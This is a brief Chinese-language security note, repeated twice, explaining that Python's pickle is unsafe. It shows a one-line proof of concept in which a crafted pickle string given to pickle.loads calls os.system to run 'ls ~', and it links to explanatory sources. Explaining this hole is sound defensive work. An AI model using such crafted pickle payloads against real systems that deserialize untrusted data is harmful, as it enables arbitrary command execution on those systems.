python pickle不安全
Pickle使用一个简单的基于栈的虚拟机来记录指令用于重建对象
import pickle pickle.loads("cos\nsystem\n(S'ls ~'\ntR.") # This will run: ls ~
链接:
http://nadiana.com/python-pickle-insecure
http://www.owasp.org.cn/OWASP_Events/download/PythonHack.pdf
Pickle使用一个简单的基于栈的虚拟机来记录指令用于重建对象
import pickle pickle.loads("cos\nsystem\n(S'ls ~'\ntR.") # This will run: ls ~
链接:
http://nadiana.com/python-pickle-insecure
http://www.owasp.org.cn/OWASP_Events/download/PythonHack.pdf